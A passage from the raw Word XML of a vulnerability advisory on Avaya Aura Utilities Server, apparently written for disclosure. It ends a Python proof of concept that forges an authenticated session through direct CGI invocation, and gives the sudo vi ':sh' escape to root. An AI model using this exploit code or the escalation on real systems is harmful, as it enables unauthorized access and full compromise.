            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>GATEWAY_INTERFACE</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>] = "CGI/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5180104D" w14:textId="6B94B0D5" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>REQUEST_METHOD</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>] = "GET"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FE3DDA" w14:textId="000591EB" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>HTTP_USER_AGENT</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] = "Mozilla/5.0 (X11; Linux x86_64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C97B2E8" w14:textId="5DBEB93C" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>QUERY_STRING</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>] = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B73889" w14:textId="67289D5D" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>REMOTE_ADDR</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A00B9D6" w14:textId="01AC5DA2" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>HTTP_COOKIE</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="48E606F5" w14:textId="30850A58" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>SCRIPT_NAME</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] = </w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BA5B208" w14:textId="7C89B0E3" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>REDIRECT_STATUS</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>] = "1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EABAC41" w14:textId="738AE983" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>REQUEST_URI</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">] = </w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + path   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFC2129" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35912326" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">([CGI_BIN, path], </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, stderr=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>subprocess.STDOUT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFE2905" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdout</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007871D9" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27B43AD2" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_session_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>IP, USER)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48414B7A" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BF96DB7" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">"Cookie: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: " + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF2ADF0" w14:textId="4DC77D5A" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>get_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>common/legal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_legal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B07D3B0" w14:textId="31BD3D77" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>'Above session cookie is now logged in as "</w:t>
            </w:r>
            <w:r w:rsidR="003530FD">
              <w:t>%s</w:t>
            </w:r>
            <w:r>
              <w:t>"'</w:t>
            </w:r>
            <w:r w:rsidR="003530FD">
              <w:t xml:space="preserve"> % USER</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0650D863" w14:textId="53210C3A" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>Hit Enter to see the result of a simple authenticated request to /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dispVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to prove access</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668A1273" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59F2A05D" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BFF00C7" w14:textId="3C13D58B" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  _ = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>input(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>""</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CDA8D7" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>except:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD2EBB7" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02A99A62" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7029DEB2" w14:textId="72CBFEBF" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00B53343">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>get_request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dispVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00DD74E7">
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, IP))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AFF15A3" w14:textId="77777777" w:rsidR="00B53343" w:rsidRDefault="00B53343" w:rsidP="00272B68"/>
    <w:p w14:paraId="3AE0A85D" w14:textId="58E45073" w:rsidR="00624CC1" w:rsidRDefault="001E48A2" w:rsidP="00624CC1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Ref58926468"/>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00624CC1">
        <w:t>) Privilege Escalation via Overly Permissi</w:t>
      </w:r>
      <w:r w:rsidR="6C3B4999">
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidR="00624CC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00624CC1">
        <w:t>Sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00624CC1">
        <w:t xml:space="preserve"> Configuration</w:t>
      </w:r>
      <w:r w:rsidR="00955ABE">
        <w:t xml:space="preserve"> (vi)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="565DAD3D" w14:textId="10AC717D" w:rsidR="001F03B3" w:rsidRDefault="001F03B3" w:rsidP="00624CC1">
      <w:r w:rsidRPr="001F03B3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>CVSS 3.1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 9.1 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F03B3">
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F03B3">
        <w:t>/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56971B70" w14:textId="5D29291F" w:rsidR="001F03B3" w:rsidRPr="001F03B3" w:rsidRDefault="001F03B3" w:rsidP="00624CC1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F91D48" w14:textId="77777777" w:rsidR="008007E1" w:rsidRDefault="008007E1" w:rsidP="00624CC1">
      <w:r>
        <w:t xml:space="preserve">Avaya Aura Utilities Server customers can access the server command line via SSH with the “admin” user credentials (using the same password as is used to access the web application). The admin user is allowed password-less </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a large number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands. Some of these commands allow trivial privilege escalation to root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BEDAE" w14:textId="5ACF9E4F" w:rsidR="001F03B3" w:rsidRPr="008007E1" w:rsidRDefault="008007E1" w:rsidP="00624CC1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008007E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Technical Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF8F55" w14:textId="78BC7539" w:rsidR="00624CC1" w:rsidRDefault="00624CC1" w:rsidP="00624CC1">
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00624CC1">
        <w:t>US-7.0.0.0.0.12-e55-01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version, one of the easiest escalations is via the following two rules:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624CC1" w14:paraId="74687601" w14:textId="77777777" w:rsidTr="00624CC1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="59BD1BF3" w14:textId="77777777" w:rsidR="00624CC1" w:rsidRDefault="00624CC1" w:rsidP="00624CC1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>(root) NOPASSWD: /bin/vi /var/www/http/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>PhoneBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1258D177" w14:textId="4D796C82" w:rsidR="00624CC1" w:rsidRDefault="00624CC1" w:rsidP="00624CC1">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>(root) NOPASSWD: /bin/vi /var/www/https/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>PhoneBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FEFCE24" w14:textId="16D2D6C7" w:rsidR="00624CC1" w:rsidRDefault="00624CC1" w:rsidP="00624CC1">
      <w:r>
        <w:br/>
        <w:t>An attacker with admin command-line access could escalate to root by running a command l</w:t>
      </w:r>
      <w:r w:rsidR="00FC32CF">
        <w:t>ike</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /bin/vi /var/www/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PhoneBackup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/a”, then typing “:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">”, then hitting Enter. Since vi allows multiple escapes to a shell, it cannot be safely allowed in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rulesets without allowing arbitrary escalation.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>An attacker would not even need a fully function shell to use the above escalation, as it is possible to use Python or Expect (which is also part of the default tools included on the server) to perform the interactive steps on the attacker’s behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144EFFCE" w14:textId="6834B9C0" w:rsidR="009D3139" w:rsidRDefault="00624CC1" w:rsidP="00624CC1">
      <w:r>
        <w:t>In the later version of this software</w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="0014600F" w:rsidRPr="0014600F">
        <w:t>US-7.1.0.0.0.18-e55-01</w:t>
      </w:r>
      <w:r w:rsidR="0014600F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="009D3139">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D3139">
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D3139">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008007E1">
        <w:t xml:space="preserve">encountered and </w:t>
      </w:r>
      <w:r w:rsidR="009D3139">
        <w:t>exploited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r w:rsidR="009D3139">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A0B31">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> client’s network, these two rules were no longer present, however </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> could not find an associated CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656A077" w14:textId="5E04D7BC" w:rsidR="009D3139" w:rsidRDefault="001E48A2" w:rsidP="009D3139">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Ref58996119"/>
      <w:r>
        <w:t>8</w:t>
      </w:r>
